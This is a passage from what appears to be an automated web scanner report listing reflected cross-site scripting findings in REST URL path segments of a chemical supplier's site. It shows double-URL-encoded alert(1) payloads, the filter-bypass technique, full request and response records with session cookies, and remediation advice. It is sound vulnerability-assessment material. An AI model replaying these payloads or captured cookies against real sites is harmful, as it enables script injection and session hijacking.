WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:30 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states/orderingbd7b0";alert(1)//e09e07d008","E404") ;
   </script>
...[SNIP]...

1.242. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f3c9%2522%253balert%25281%2529%252f%252f171a6932c4f was submitted in the REST URL parameter 1. This input was echoed as 6f3c9";alert(1)//171a6932c4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content6f3c9%2522%253balert%25281%2529%252f%252f171a6932c4f/sigma-aldrich/the-americas/united-states/promotional-offers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:23 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content6f3c9";alert(1)//171a6932c4f/sigma-aldrich/the-americas/united-states/promotional-offers","E404") ;
   </script>
...[SNIP]...

1.243. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d3ed%2522%253balert%25281%2529%252f%252f542fb904e78 was submitted in the REST URL parameter 2. This input was echoed as 9d3ed";alert(1)//542fb904e78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich9d3ed%2522%253balert%25281%2529%252f%252f542fb904e78/the-americas/united-states/promotional-offers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:25 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich9d3ed";alert(1)//542fb904e78/the-americas/united-states/promotional-offers","E404") ;
   </script>
...[SNIP]...

1.244. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f223%2522%253balert%25281%2529%252f%252f9aee3a45215 was submitted in the REST URL parameter 3. This input was echoed as 8f223";alert(1)//9aee3a45215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas8f223%2522%253balert%25281%2529%252f%252f9aee3a45215/united-states/promotional-offers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas8f223";alert(1)//9aee3a45215/united-states/promotional-offers","E404") ;
   </script>
...[SNIP]...

1.245. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c161%2522%253balert%25281%2529%252f%252f253a861f702 was submitted in the REST URL parameter 4. This input was echoed as 8c161";alert(1)//253a861f702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states8c161%2522%253balert%25281%2529%252f%252f253a861f702/promotional-offers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states8c161";alert(1)//253a861f702/promotional-offers","E404") ;
   </script>
...[SNIP]...

1.246. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2605%2522%253balert%25281%2529%252f%252fd1711f2b49f was submitted in the REST URL parameter 5. This input was echoed as f2605";alert(1)//d1711f2b49f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states/promotional-offersf2605%2522%253balert%25281%2529%252f%252fd1711f2b49f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
